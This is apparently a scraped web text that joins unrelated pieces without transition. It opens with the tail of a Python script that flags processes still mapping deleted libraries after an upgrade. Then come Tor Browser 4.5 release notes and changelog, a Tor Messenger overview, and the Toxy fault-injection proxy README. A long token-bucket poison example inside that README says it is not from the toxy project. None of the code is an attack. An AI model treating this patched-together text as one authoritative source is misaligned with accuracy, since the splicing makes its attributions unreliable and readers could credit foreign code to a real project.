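constructed /proc/<pid>/maps excerpt for an sshd that kept running across a
libc/OpenSSL upgrade."""
import os
import re

# /proc/<pid>/maps line: address perms offset dev inode [pathname]
_MAPS = re.compile(r'^\S+\s+\S+\s+\S+\s+\S+\s+\d+\s*(.*)$')

# Mappings that are expected to be unlinked (shared memory, memfd, tmp files
# some runtimes create) and say nothing about stale upgrades.
_IGNORE = ('/dev/', '/memfd:', '/SYSV', '/run/', '/tmp/')


def parse_maps(text):
    """Return the sorted list of on-disk file paths mapped by a process whose
    backing file has been unlinked (the "(deleted)" suffix)."""
    found = set()
    for line in text.splitlines():
        m = _MAPS.match(line)
        if not m:
            continue
        path = m.group(1).strip()
        if not path.endswith(' (deleted)') or not path.startswith('/'):
            continue
        path = path[:-len(' (deleted)')]
        if path.startswith(_IGNORE):
            continue
        found.add(path)
    return sorted(found)


def scan_proc(proc='/proc'):
    """Map pid -> (comm, deleted paths) for every process we can read."""
    hits = {}
    try:
        pids = [p for p in os.listdir(proc) if p.isdigit()]
    except OSError:
        return hits
    for pid in pids:
        try:
            with open(f'{proc}/{pid}/maps') as fh:
                deleted = parse_maps(fh.read())
            with open(f'{proc}/{pid}/comm') as fh:
                comm = fh.read().strip()
        except OSError:  # process exited, or we lack permission (run as root)
            continue
        if deleted:
            hits[int(pid)] = (comm, deleted)
    return hits


# Constructed sample, not captured from a real host.
SAMPLE_MAPS = """\
55d7a1c00000-55d7a1c8a000 r-xp 00000000 08:01 1048585                    /usr/sbin/sshd
7f6b0c000000-7f6b0c1c2000 r-xp 00000000 08:01 393250                     /lib/x86_64-linux-gnu/libc-2.19.so (deleted)
7f6b0c400000-7f6b0c5f0000 r-xp 00000000 08:01 393301                     /usr/lib/x86_64-linux-gnu/libssl.so.1.0.0 (deleted)
7f6b0c800000-7f6b0c801000 rw-p 00000000 00:00 0                          /dev/zero (deleted)
7f6b0ca00000-7f6b0ca21000 rw-p 00000000 00:00 0 
7ffd3e5c0000-7ffd3e5e1000 rw-p 00000000 00:00 0                          [stack]
"""

if __name__ == '__main__':
    print('sample:', parse_maps(SAMPLE_MAPS))
    for pid, (comm, paths) in sorted(scan_proc().items()):
        print(f'{pid:>6} {comm:<16} {", ".join(paths)}')
```

    A hit means the process is still running the old code, so a vulnerability fixed by the package upgrade is not fixed in that process until it is restarted; after a libc or OpenSSL update that is usually most of the network daemons on the box.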


    Download Tiger

    Tor Browser 4.5 - Everything you Need to Safely Browse the Internet


    The Tor software protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, it prevents the sites you visit from learning your physical location, and it lets you access sites which are blocked.

    The Tor Browser lets you use Tor on Windows, Mac OS X, or Linux without needing to install any software. It can run off a USB flash drive, comes with a pre-configured web browser to protect your anonymity, and is self-contained.

    The 4.5 series provides significant usability, security, and privacy enhancements over the 4.0 series. Because these changes are significant, we will be delaying the automatic update of 4.0 users to the 4.5 series for one week.

    Usability Improvements

    On the usability front, we've improved the application launch experience for both Windows and Linux users. During install, Windows users are now given the choice to add Tor Browser to the Start Menu/Applications view, which should make it easier to find and launch. This choice is on by default, but can be disabled, and only affects the creation of shortcuts - the actual Tor Browser is still self-contained as a portable app folder. On the Linux side, users now start Tor Browser through a new wrapper that enables launching from the File Manager, the Desktop, or the Applications menu. The same wrapper can also be used from the command line.
    We've also simplified the Tor menu (the green onion) and the associated configuration windows. The menu now provides information about the current Tor Circuit in use for a page, and also provides an option to request a new Tor Circuit for a site. Tor Browser is also much better at handling Tor Circuits in general: while a site remains in active use, all associated requests will continue to be performed over the same Tor Circuit. This means that sites should no longer suddenly change languages, behaviors, or log you out while you are using them.

    Figure 1: The new Tor Onion Menu


    Security Improvements

    On the security front, the most exciting news is the new Security Slider. The Security Slider provides user-friendly vulnerability surface reduction - as the security level is increased, browser features that were shown to have a high historical vulnerability count in the iSec Partners hardening study are progressively disabled. This feature is available from the Tor onion menu's "Privacy and Security Settings" choice.

    Figure 2: The new Security Slider

    Our Windows packages are now signed with a hardware signing token graciously donated by DigiCert. This means that Windows users should no longer be prompted about Tor Browser coming from an unknown source. Additionally, our automatic updates are now individually signed with an offline signing key. In both cases, these signatures can be reproducibly removed, so that builders can continue to verify that the packages they produce match the official build binaries.
    The 4.5 series also features a rewrite of the obfs2, obfs3, and ScrambleSuit transports in Go, as well as the introduction of the new obfs4 transport. The obfs4 transport provides additional DPI and probing resistance features which prevent automated scanning for Tor bridges. As long as they are not discovered via other mechanisms, fresh obfs4 bridge addresses will work in China today. Additionally, barring new attacks, private obfs4 addresses should continue to work indefinitely.

    Privacy Improvements

    On the privacy front, the 4.5 series improves on our pre-existing first party isolation implementation to prevent third party tracking. First party isolation provides the property that third party advertisements, "like buttons", or "mashup" content that is included on one site will at most only know about your activity on that site, and will not be able to match it to your activity while you are on any other site. In other words, with first party isolation, Facebook, Twitter, and Google+ can't track you around the entire web using their infamous like buttons.
    Specifically, in the 4.5 release, we now ensure that blob: URIs are scoped to the URL bar domain that created them, and the SharedWorker API has been disabled to prevent cross-site and third party communication. We also now make full use of Tor's circuit isolation to ensure that all requests for any third party content included by a site travel down the same Tor Circuit. This isolation also ensures that requests to the same third party site actually use separate Tor Circuits when the URL bar domain is different. This request isolation is enforced even when long-lived "HTTP Keep-Alive" connections are used.

    We have also improved our resolution and locale fingerprinting defenses, and we now disable the device sensor and video statistics APIs.

    New Search Provider

    Our default search provider has also been changed to Disconnect. Disconnect provides private Google search results to Tor users without Captchas or bans.

    Full Changelogs

    Here is the complete list of changes in the 4.5 series since 4.0:
    • All Platforms
      • Update Tor to 0.2.6.7 with additional patches:
        • Bug 15482: Reset timestamp_dirty each time a SOCKSAuth circuit is used
      • Update NoScript to 2.6.9.22
      • Update HTTPS-Everywhere to 5.0.3
        • Bug 15689: Resume building HTTPS-Everywhere from git tags
      • Update meek to 0.17
      • Include obfs4proxy 0.0.5
        • Use obfs4proxy for obfs2, obfs3, obfs4, and ScrambleSuit bridges
      • Pluggable Transport Dependency Updates:
        • Bug 15265: Switch go.net repo to golang.org/x/net
        • Bug 15448: Use golang 1.4.2 for meek and obfs4proxy
      • Update Tor Launcher to 0.2.7.4. Changes since 0.2.7.0.2 in 4.0.8:
        • Bug 11879: Stop bootstrap if Cancel or Open Settings is clicked
        • Bug 13271: Display Bridge Configuration wizard pane before Proxy pane
        • Bug 13576: Don't strip "bridge" from the middle of bridge lines
        • Bug 13983: Directory search path fix for Tor Messenger+TorBirdy
        • Bug 14122: Hide logo if TOR_HIDE_BROWSER_LOGO set
        • Bug 14336: Fix navigation button display issues on some wizard panes
        • Bug 15657: Display the host:port of any connection failures in bootstrap
        • Bug 15704: Do not enable network if wizard is opened
      • Update Torbutton to 1.9.2.2. Changes since 1.7.0.2 in 4.0.8:
        • Bug 3455: Use SOCKS user+pass to isolate all requests from the same url domain
        • Bug 5698: Use "Tor Browser" branding in "About Tor Browser" dialog
        • Bug 7255: Warn users about maximizing windows
        • Bug 8400: Prompt for restart if disk records are enabled/disabled.
        • Bug 8641: Create browser UI to indicate current tab's Tor circuit IPs
          • (Many Circuit UI issues were fixed during 4.5; see release changelogs for those).
        • Bug 9387: Security Slider 1.0
          • Include descriptions and tooltip hints for security levels
          • Notify users that the security slider exists
          • Make use of new SVG, jar, and MathML prefs
        • Bug 9442: Add New Circuit button to Torbutton menu
        • Bug 9906: Warn users before closing all windows and performing new identity.
        • Bug 10216: Add a pref to disable the local tor control port test
        • Bug 10280: Strings and pref for preventing plugin initialization.
        • Bug 11175: Remove "About Torbutton" from onion menu.
        • Bug 11236: Don't set omnibox order in Torbutton (to prevent translation)
        • Bug 11449: Fix new identity error if NoScript is not enabled
        • Bug 13019: Change locale spoofing pref to boolean
        • Bug 13079: Option to skip control port verification
        • Bug 13406: Stop directing users to download-easy.html.en on update
        • Bug 13650: Clip initial window height to 1000px
        • Bugs 13751+13900: Remove SafeCache cache isolation code in favor of C++ patch
        • Bug 13766: Set a 10 minute circuit lifespan for non-content requests
        • Bug 13835: Option to change default Tor Browser homepage
        • Bug 13998: Handle changes in NoScript 2.6.9.8+
        • Bug 14100: Option to hide NetworkSettings menuitem
        • Bug 14392: Don't steal input focus in about:tor search box
        • Bug 14429: Provide automatic window resizing, but disable for now
        • Bug 14448: Restore Torbutton menu operation on non-English localizations
        • Bug 14490: Use Disconnect search in about:tor search box
        • Bug 14630: Hide Torbutton's proxy settings tab.
        • Bug 14631: Improve profile access error msgs (strings for translation).
        • Bugs 14632+15334: Display Cookie Protections only if disk records are enabled
        • Bug 15085: Fix about:tor RTL text alignment problems
        • Bug 15460: Ensure FTP urls use content-window circuit isolation
        • Bug 15502: Wipe blob: URIs on New Identity
        • Bug 15533: Restore default security level when restoring defaults
        • Bug 15562: Bind SharedWorkers to thirdparty pref
      • Bug 3455: Patch Firefox SOCKS and proxy filters to allow user+pass isolation
      • Bug 4100: Raise HTTP Keep-Alive back to 115 second default
      • Bug 5698: Fix branding in "About Torbrowser" window
      • Bug 10280: Don't load any plugins into the address space by default
      • Bug 11236: Fix omnibox order for non-English builds
        • Also remove Amazon, eBay and bing; add Youtube and Twitter
      • Bug 11955: Backport HTTPS Certificate Pinning patches from Firefox 32
      • Bug 12430: Provide a preference to disable remote jar: urls
      • Bugs 12827+15794: Create preference to disable SVG images (for security slider)
      • Bug 13019: Prevent Javascript from leaking system locale
      • Bug 13379: Sign our MAR update files
      • Bug 13439: No canvas prompt for content callers
      • Bug 13548: Create preference to disable MathML (for security slider)
      • Bug 13586: Make meek use TLS session tickets (to look like stock Firefox).
      • Bug 13684: Backport Mozilla bug #1066190 (pinning issue fixed in Firefox 33)
      • Bug 13788: Fix broken meek in 4.5-alpha series
      • Bug 13875: Spoof window.devicePixelRatio to avoid DPI fingerprinting
      • Bug 13900: Remove 3rd party HTTP auth tokens via Firefox patch
      • Bug 14392: Make about:tor hide itself from the URL bar
      • Bug 14490: Make Disconnect the default omnibox search engine
      • Bug 14631: Improve startup error messages for filesystem permissions issues
      • Bugs 14716+13254: Fix issues with HTTP Auth usage and TLS connection info display
      • Bug 14937: Hard-code meek and flashproxy node fingerprints
      • Bug 15029: Don't prompt to include missing plugins
      • Bug 15406: Only include addons in incremental updates if they actually update
      • Bug 15411: Remove old (and unused) cacheDomain cache isolation mechanism
      • Bug 15502: Isolate blob: URI scope to URL domain; block WebWorker access
      • Bug 15562: Disable Javascript SharedWorkers due to third party tracking
      • Bug 15757: Disable Mozilla video statistics API extensions
      • Bug 15758: Disable Device Sensor APIs
    • Linux
      • Bug 12468: Only print/write log messages if launched with --debug
      • Bug 13375: Create a hybrid GUI/desktop/shell launcher wrapper
      • Bug 13717: Make sure we use the bash shell on Linux
      • Bug 15672: Provide desktop app registration+unregistration for Linux
      • Bug 15747: Improve start-tor-browser argument handling
    • Windows
      • Bug 3861: Begin signing Tor Browser for Windows the Windows way
      • Bug 10761: Fix instances of shutdown crashes
      • Bug 13169: Don't use /dev/random on Windows for SSP
      • Bug 14688: Create shortcuts to desktop and start menu by default (optional)
      • Bug 15201: Disable 'runas Administrator' codepaths in updater
      • Bug 15539: Make installer exe signatures reproducibly removable
    • Mac
      • Bug 10138: Switch to 64bit builds for MacOS
    Here is the list of changes since the last 4.5 alpha (4.5a5):

    • All Platforms
      • Update Tor to 0.2.6.7 with additional patches:
        • Bug 15482: Reset timestamp_dirty each time a SOCKSAuth circuit is used
      • Update NoScript to 2.6.9.22
      • Update HTTPS-Everywhere to 5.0.3
        • Bug 15689: Resume building HTTPS-Everywhere from git tags
      • Update meek to 0.17
      • Update obfs4proxy to 0.0.5
      • Update Tor Launcher to 0.2.7.4
        • Bug 15704: Do not enable network if wizard is opened
        • Bug 11879: Stop bootstrap if Cancel or Open Settings is clicked
        • Bug 13576: Don't strip "bridge" from the middle of bridge lines
        • Bug 15657: Display the host:port of any connection failures in bootstrap
      • Update Torbutton to 1.9.2.2
        • Bug 15562: Bind SharedWorkers to thirdparty pref
        • Bug 15533: Restore default security level when restoring defaults
        • Bug 15510: Close Tor Circuit UI control port connections on New Identity
        • Bug 15472: Make node text black in circuit status UI
        • Bug 15502: Wipe blob URIs on New Identity
        • Bug 15795: Some security slider prefs do not trigger custom checkbox
        • Bug 14429: Disable automatic window resizing for now
      • Bug 4100: Raise HTTP Keep-Alive back to 115 second default
      • Bug 13875: Spoof window.devicePixelRatio to avoid DPI fingerprinting
      • Bug 15411: Remove old (and unused) cacheDomain cache isolation mechanism
      • Bugs 14716+13254: Fix issues with HTTP Auth usage and TLS connection info display
      • Bug 15502: Isolate blob URI scope to URL domain; block WebWorker access
      • Bug 15794: Crash on some pages with SVG images if SVG is disabled
      • Bug 15562: Disable Javascript SharedWorkers due to third party tracking
      • Bug 15757: Disable Mozilla video statistics API extensions
      • Bug 15758: Disable Device Sensor APIs
    • Linux
      • Bug 15747: Improve start-tor-browser argument handling
      • Bug 15672: Provide desktop app registration+unregistration for Linux
    • Windows
      • Bug 15539: Make installer exe signatures reproducibly removable
      • Bug 10761: Fix instances of shutdown crashes  


    Download Tor Browser 4.5

    Tor Messenger - Chat over Tor, Easily

    Tor Messenger is a cross-platform chat program that aims to be secure by default and sends all of its traffic over Tor. It supports a wide variety of transport networks, including Jabber (XMPP), IRC, Google Talk, Facebook Chat, Twitter, Yahoo, and others; enables Off-the-Record (OTR) Messaging automatically; and has an easy-to-use graphical user interface localized into multiple languages.

    What it isn't...

    Tor Messenger builds on the networks you are familiar with, so that you can continue communicating in a way your contacts are willing and able to do. This has traditionally been in a client-server model, meaning that your metadata (specifically the relationships between contacts) can be logged by the server. However, your route to the server will be hidden because you are communicating over Tor.
    We are also excited about systems like Pond and Ricochet, which try to solve this problem, and would encourage you to look at their designs and use them too.

    Why Instantbird?

    We considered a number of messaging clients: Pidgin, Adam Langley's xmpp-client, and Instantbird. Instantbird was the pragmatic choice -- its transport protocols are written in a memory-safe language (JavaScript); it has a graphical user interface and already supports many natural languages; and it's a XUL application, which means we can leverage both the code (Tor Launcher) and in-house expertise that the Tor Project has developed working on Tor Browser with Firefox. It also has an active and vibrant software developer community that has been very responsive and understanding of our needs. The main feature it lacked was OTR support, which we have implemented and hope to upstream to the main Instantbird repository for the benefit of all Instantbird (and Thunderbird) users.

    Instructions

    • On Linux, extract the bundle(s) and then run: ./start-tor-messenger.desktop
    • On OS X, copy the Tor Messenger application from the disk image to your local disk before running it.
    • On all platforms, Tor Messenger sets the profile folder for Firefox/Instantbird to the installation directory.
    • Note that as a policy, unencrypted one-to-one conversations are not allowed and your messages will not be transmitted if the person you are talking with does not have an OTR-enabled client. You can disable this option in the preferences to allow unencrypted communication but doing so is not recommended.

    Toxy - Hackable Http Proxy To Simulate Server Failure Scenarios And Network Conditions


    Toxy is a fully programmatic and hackable HTTP proxy to simulate server failure scenarios and unexpected network conditions, built for node.js / io.js.

    It was mainly designed for fuzzing/evil testing purposes, where toxy becomes particularly useful to cover the fault tolerance and resiliency capabilities of a system, especially in disruption-tolerant networks and service-oriented architectures, where toxy may act as a MitM proxy among services.

    toxy allows you to plug in poisons, optionally filtered by rules, which can intercept and alter the HTTP flow as you need, performing multiple evil actions in the middle of that process, such as limiting the bandwidth, delaying TCP packets, injecting network jitter latency or replying with a custom error or status code. It operates only at L7 (application level).

    toxy can be used fluently either programmatically or via its HTTP API. It was built on top of rocky, a full-featured middleware-oriented HTTP proxy, and it's also pluggable into connect / express as standard middleware.

    Requires node.js +0.12 or io.js +1.6

    Features
    • Full-featured HTTP/S proxy (backed by rocky and http-proxy )
    • Hackable and elegant programmatic API (inspired on connect/express)
    • Admin HTTP API for external management and dynamic configuration
    • Featured built-in router with nested configuration
    • Hierarchical and composable poisoning with rule based filtering
    • Hierarchical middleware layer (both global and route scopes)
    • Easily augmentable via middleware (based on connect/express middleware)
    • Supports both incoming and outgoing traffic poisoning
    • Built-in poisons (bandwidth, error, abort, latency, slow read...)
    • Rule-based poisoning (probabilistic, HTTP method, headers, body...)
    • Supports third-party poisons and rules
    • Built-in balancer and traffic interceptor via middleware
    • Inherits API and features from rocky
    • Compatible with connect/express (and most of their middleware)
    • Able to run as standalone HTTP proxy

    Introduction

    Why toxy?
    There are other solutions similar to toxy on the market, but most of them do not provide proper programmatic control, are usually not easy to hack or configure, or are directly closed to extensibility.
    Furthermore, the majority of those solutions only operate at the TCP L3 level of the stack instead of providing high-level abstractions that cover common requirements in the specific domain and nature of the HTTP L7 protocol, as toxy tries to do.
    toxy brings a powerful, hackable and extensible solution with a convenient abstraction, without losing proper low-level interface capabilities to deal with HTTP protocol primitives easily.
    toxy was designed based on the principles of composition, simplicity and extensibility. Via its built-in hierarchical domain-specific middleware layer you can easily augment toxy's features to your own needs.

    Concepts
    toxy introduces two directives: poisons and rules.
    Poisons are the specific logic which infects an incoming or outgoing HTTP transaction (e.g. injecting latency, replying with an error). One HTTP transaction can be poisoned by one or multiple poisons, and those poisons can also be configured to infect traffic at either global or route level.
    Rules are a kind of match validation filter that inspects an HTTP request/response in order to determine, given certain conditions, whether the HTTP transaction should be poisoned or not (e.g. if the headers, query params, method or body match). Rules can be reused and applied to both incoming and outgoing traffic flows, in different scopes: global, route or poison level.

    How it works
    ↓  ( Incoming request )  ↓
    ↓          |||           ↓
    ↓    +-------------+     ↓
    ↓    | Toxy Router |     ↓ -> Match the incoming request
    ↓    +-------------+     ↓
    ↓          |||           ↓
    ↓ +--------------------+ ↓
    ↓ |   Incoming phase   | ↓ -> The proxy receives the request from the client
    ↓ |~~~~~~~~~~~~~~~~~~~~| ↓
    ↓ |  ----------------  | ↓
    ↓ |  |  Exec Rules  |  | ↓ -> Apply configured rules for the incoming request
    ↓ |  ----------------  | ↓
    ↓ |        |||         | ↓
    ↓ |  ----------------  | ↓
    ↓ |  | Exec Poisons |  | ↓ -> If all rules passed, then poison the HTTP flow
    ↓ |  ----------------  | ↓
    ↓ +~~~~~~~~~~~~~~~~~~~~+ ↓
    ↓        /      \        ↓
    ↓        \      /        ↓
    ↓ +--------------------+ ↓
    ↓ |  HTTP dispatcher   | ↓ -> Forward the HTTP traffic to the target server, either poisoned or not
    ↓ +--------------------+ ↓
    ↓        /      \        ↓
    ↓        \      /        ↓
    ↓ +--------------------+ ↓
    ↓ |   Outgoing phase   | ↓ -> Receives response from target server
    ↓ |~~~~~~~~~~~~~~~~~~~~| ↓
    ↓ |  ----------------  | ↓
    ↓ |  |  Exec Rules  |  | ↓ -> Apply configured rules for the outgoing response
    ↓ |  ----------------  | ↓
    ↓ |        |||         | ↓
    ↓ |  ----------------  | ↓
    ↓ |  | Exec Poisons |  | ↓ -> If all rules passed, then poison the HTTP flow before send it to the client
    ↓ |  ----------------  | ↓
    ↓ +~~~~~~~~~~~~~~~~~~~~+ ↓
    ↓          |||           ↓
    ↓ ( Send to the client ) ↓ -> Finally, send the response to the client, either poisoned or not
    

    Usage

    Installation
    npm install toxy
    

    Examples
    See examples directory for more use cases.
    var toxy = require('toxy')
    var poisons = toxy.poisons
    var rules = toxy.rules
    
    // Create a new toxy proxy
    var proxy = toxy()
    
    // Default server to forward incoming traffic
    proxy
      .forward('http://httpbin.org')
    
    // Register global poisons and rules
    proxy
      .poison(poisons.latency({ jitter: 500 }))
      .rule(rules.probability(25))
    
    // Register multiple routes
    proxy
      .get('/download/*')
      .forward('http://files.myserver.net')
      .poison(poisons.bandwidth({ bps: 1024 }))
      .withRule(rules.headers({'Authorization': /^Bearer (.*)$/i }))
    
    // Infect outgoing traffic only (after the server replied properly)
    proxy
      .get('/image/*')
      .outgoingPoison(poisons.bandwidth({ bps: 512 }))
      .withRule(rules.method('GET'))
      .withRule(rules.timeThreshold({ duration: 1000, threshold: 1000 * 10 }))
      .withRule(rules.responseStatus({ range: [ 200, 400 ] }))
    
    proxy
      .all('/api/*')
      .poison(poisons.rateLimit({ limit: 10, threshold: 1000 }))
      .withRule(rules.method(['POST', 'PUT', 'DELETE']))
      // And use a different more permissive poison for GET requests
      .poison(poisons.rateLimit({ limit: 50, threshold: 1000 }))
      .withRule(rules.method('GET'))
    
    // Handle the rest of the traffic
    proxy
      .all('/*')
      .poison(poisons.slowClose({ delay: 1000 }))
      .poison(poisons.slowRead({ bps: 128 }))
      .withRule(rules.probability(50))
    
    proxy.listen(3000)
    console.log('Server listening on port:', 3000)
    console.log('Test it:', 'http://localhost:3000/image/jpeg')

    Poisons
    Poisons host the specific logic which intercepts and mutates, wraps, modifies and/or cancels an HTTP transaction in the proxy server. Poisons can be applied to incoming or outgoing traffic flows, or even both.
    Poisons can be composed and reused for different HTTP scenarios. They are executed in FIFO order and asynchronously.

    Poisoning scopes
    toxy has a hierarchical design based on two different scopes: global and route.
    Global scope covers all the incoming HTTP traffic received by the proxy server, regardless of the HTTP method or path.
    Route scope covers any incoming traffic which matches a specific HTTP verb and URI path.
    Poisons can be plugged into both scopes, meaning you can operate with better accuracy and restrict the scope of the poisoning; for instance, you might want to apply bandwidth-limit poisoning only to certain routes, such as /download or /images.
    See routes.js for a full example.

    Poisoning phases
    Poisons can be plugged to incoming or outgoing traffic flows, or even both.
    Incoming poisoning is applied when the traffic has been received by the proxy but has not been forwarded to the target server yet.
    Outgoing poisoning refers to traffic that has been forwarded to the target server and whose response the proxy has received, but that response has not been sent to the client yet.
    This means, essentially, that you can plug in your poisons to infect the HTTP traffic before or after the request is forwarded to the target HTTP server or sent to the client.
    This allows you to apply better and more accurate poisoning based on the request or the server response. For instance, given the nature of some poisons, like inject error, you may want to enable it according to the target server response (e.g. whether some header is present or not).
    See poison-phases.js for a full example.

    Built-in poisons

    Latency
    Name latency
    Poisoning Phase incoming / outgoing
    Reaches the server true
    Infects the HTTP flow by injecting latency jitter into the response
    Arguments :
    • options object
      • jitter number - Jitter value in milliseconds
      • max number - Random jitter maximum value
      • min number - Random jitter minimum value
    toxy.poison(toxy.poisons.latency({ jitter: 1000 }))
    // Or alternatively using a random value
    toxy.poison(toxy.poisons.latency({ max: 1000, min: 100 }))

    Inject response
    Name inject
    Poisoning Phase incoming / outgoing
    Reaches the server false (only as incoming poison)
    Injects a custom response, intercepting the request before sending it to the target server. Useful to simulate errors originating in the server.
    Arguments :
    • options object
      • code number - Response HTTP status code. Default 500
      • headers object - Optional headers to send
      • body mixed - Optional body data to send. It can be a buffer or string
      • encoding string - Body encoding. Default to utf8
    toxy.poison(toxy.poisons.inject({
      code: 503,
      body: '{"error": "toxy injected error"}',
      headers: {'Content-Type': 'application/json'}
    }))

    Bandwidth
    Name bandwidth
    Poisoning Phase incoming / outgoing
    Reaches the server true
    Limits the amount of bytes sent over the network in outgoing HTTP traffic for a specific time frame.
    This poison is basically an alias to throttle.
    Arguments :
    • options object
      • bytes number - Size in bytes of each chunk to send. Default 1024
      • threshold number - Packets time frame in milliseconds. Default 1000
    toxy.poison(toxy.poisons.bandwidth({ bytes: 512 }))

    Rate limit
    Name rateLimit
    Poisoning Phase incoming / outgoing
    Reaches the server true
    Limits the number of requests received by the proxy in a specific threshold time frame. Designed to test API limits. Exposes the typical X-RateLimit-* headers.
    Note that this is a very simple rate limit implementation: limits are stored in-memory and are therefore completely volatile. There are a number of full-featured and consistent rate limiter implementations in npm that you can plug in as poisons. You might also be interested in the token bucket algorithm.
    Arguments :
    • options object
      • limit number - Total amount of requests. Default to 10
      • threshold number - Limit time frame in milliseconds. Default to 1000
      • message string - Optional error message when limit is reached.
      • code number - HTTP status code when limit is reached. Default to 429.
    toxy.poison(toxy.poisons.rateLimit({ limit: 5, threshold: 10 * 1000 }))

    Slow read
    Name slowRead
    Poisoning Phase incoming
    Reaches the server true
    Reads incoming payload data packets slowly. Only valid for non-GET requests.
    Arguments :
    • options object
      • chunk number - Packet chunk size in bytes. Default to 1024
      • threshold number - Limit threshold time frame in milliseconds. Default to 1000
    toxy.poison(toxy.poisons.slowRead({ chunk: 2048, threshold: 1000 }))

    Slow open
    Name slowOpen
    Poisoning Phase incoming
    Reaches the server true
    Delays the HTTP connection ready state.
    Arguments :
    • options object
      • delay number - Delay connection in milliseconds. Default to 1000
    toxy.poison(toxy.poisons.slowOpen({ delay: 2000 }))

    Slow close
    Name slowClose
    Poisoning Phase incoming / outgoing
    Reaches the server true
    Delays the HTTP connection close signal (EOF).
    Arguments :
    • options object
      • delay number - Delay time in milliseconds. Default to 1000
    toxy.poison(toxy.poisons.slowClose({ delay: 2000 }))

    Throttle
    Name throttle
    Poisoning Phase incoming / outgoing
    Reaches the server true
    Restricts the amount of packets sent over the network in a specific threshold time frame.
    Arguments :
    • options object
      • chunk number - Packet chunk size in bytes. Default to 1024
      • delay object - Data chunk delay time frame in milliseconds. Default to 100
    toxy.poison(toxy.poisons.throttle({ chunk: 2048, threshold: 1000 }))

    Abort connection
    Name abort
    Poisoning Phase incoming / outgoing
    Reaches the server false (only as incoming poison)
    Aborts the TCP connection. From the low-level perspective, this will destroy the socket on the server, operating only at TCP level without sending any specific HTTP application level data.
    Arguments :
    • options object
      • delay number - Aborts the TCP connection after waiting the given milliseconds. Default to 0
      • next boolean - If true, the connection will be aborted if the target server takes longer than delay to reply. Default to false
      • error Error - Custom internal node.js error to use when destroying the socket. Default to null
    // Basic connection abort
    toxy.poison(toxy.poisons.abort())
    // Abort after a delay
    toxy.poison(toxy.poisons.abort(1000))
    // In this case, the socket will be closed if
    // the target server takes more than
    // 2 seconds to respond
    toxy.poison(toxy.poisons.abort({ delay: 2000, next: true }))

    Timeout
    Name timeout
    Poisoning Phase incoming / outgoing
    Reaches the server true
    Defines a response timeout. Useful when forwarding to potentially slow servers.
    Arguments :
    • milliseconds number - Timeout limit in milliseconds
    toxy.poison(toxy.poisons.timeout(5000))

    How to write poisons
    Poisons are implemented as standalone middleware (like in connect/express).
    Here's a simple example of a server latency poison:
    var toxy = require('toxy')
    
    function customLatency(delay) {
      /**
       * We name the function since toxy uses it as identifier to get/disable/remove it in the future
       */
      return function customLatency(req, res, next) {
        var timeout = setTimeout(clean, delay)
        req.once('close', onClose)
    
        function onClose() {
          clearTimeout(timeout)
          next('client connection closed')
        }
    
        function clean() {
          req.removeListener('close', onClose)
          next()
        }
      }
    }
    
    var proxy = toxy()
    
    // Register and enable the poison
    proxy
      .get('/foo')
      .poison(customLatency(2000))
    You can optionally extend the built-in poisons with your own poisons:
    toxy.addPoison(customLatency)
    
    // Then you can use it like a built-in poison factory
    proxy
      .get('/foo')
      .poison(toxy.poisons.customLatency(2000))
    For a full real-world example, take a look at the built-in poisons implementation.
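    The rate limit section above notes that the built-in rateLimit keeps a volatile in-memory counter and points at the token bucket algorithm as an alternative. The following is an added example, not code from the toxy project, of a custom poison written in the middleware style just described that rate-limits with a token bucket. It assumes only the poison(req, res, next) contract shown above; the option names (capacity, refillPerSecond, code, now), the fake response object and the request timeline are constructed for this example.

```javascript
// Added example (not part of the toxy project): a custom poison that rate-limits
// with a token bucket instead of the fixed-window counter of the built-in rateLimit.
// Assumes only the middleware contract the README shows: poison(req, res, next).

// Token bucket with an injectable clock (milliseconds) so behaviour is testable without waiting.
function createTokenBucket(capacity, refillPerSecond, now) {
  var tokens = capacity
  var last = now()
  return {
    // Refill according to elapsed time, then try to consume one token.
    // Returns true when the request may proceed.
    take: function () {
      var t = now()
      var elapsedSeconds = Math.max(0, (t - last) / 1000)
      tokens = Math.min(capacity, tokens + elapsedSeconds * refillPerSecond)
      last = t
      if (tokens >= 1) {
        tokens -= 1
        return true
      }
      return false
    },
    remaining: function () { return Math.floor(tokens) }
  }
}

// Poison factory. The inner function is named so toxy can get/disable/remove it by name.
// Option names (capacity, refillPerSecond, code, now) are this example's own choice.
function tokenBucketRateLimit(opts) {
  opts = opts || {}
  var capacity = opts.capacity || 10
  var refillPerSecond = opts.refillPerSecond || 1
  var code = opts.code || 429
  var bucket = createTokenBucket(capacity, refillPerSecond, opts.now || Date.now)

  return function tokenBucketRateLimit(req, res, next) {
    if (bucket.take()) {
      // Expose the usual X-RateLimit-* headers and let the request reach the target server.
      res.setHeader('X-RateLimit-Limit', String(capacity))
      res.setHeader('X-RateLimit-Remaining', String(bucket.remaining()))
      return next()
    }
    // Limit exceeded: answer from the proxy and do not call next(), so the
    // request never reaches the target server (like the built-in inject poison).
    res.writeHead(code, {
      'Content-Type': 'application/json',
      'Retry-After': String(Math.ceil(1 / refillPerSecond))
    })
    res.end(JSON.stringify({ error: 'rate limit exceeded' }))
  }
}

// Minimal stand-in for node's ServerResponse, just enough to observe what the poison did.
function fakeResponse() {
  var res = { statusCode: 200, headers: {}, body: '' }
  res.setHeader = function (name, value) { res.headers[name.toLowerCase()] = value }
  res.writeHead = function (status, headers) {
    res.statusCode = status
    Object.keys(headers || {}).forEach(function (name) { res.setHeader(name, headers[name]) })
  }
  res.end = function (body) { res.body = body || '' }
  return res
}

// Constructed scenario: bucket of 2 tokens refilling at 1/s, three requests at t=0 and one at t=2s.
function simulate() {
  var clockMs = 0
  var poison = tokenBucketRateLimit({
    capacity: 2,
    refillPerSecond: 1,
    now: function () { return clockMs }
  })
  return [0, 0, 0, 2000].map(function (time) {
    clockMs = time
    var res = fakeResponse()
    var forwarded = false
    poison({ method: 'GET', url: '/api/items', headers: {} }, res, function () { forwarded = true })
    return {
      time: time,
      forwarded: forwarded,
      status: res.statusCode,
      remaining: res.headers['x-ratelimit-remaining']
    }
  })
}

console.log(JSON.stringify(simulate(), null, 2))
```

    Because the poison answers the client itself and never calls next() once the bucket is empty, the excess requests are absorbed in the proxy rather than reaching the target, which is the behaviour you want when using toxy to check how a client copes with a 429 and a Retry-After hint.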

    Rules
    Rules are simple validation filters which inspect incoming or outgoing HTTP traffic in order to determine, given certain conditions (e.g. matching the method, headers, query params, body...), whether the current HTTP transaction should be poisoned or not, based on the resolution value of the rule.
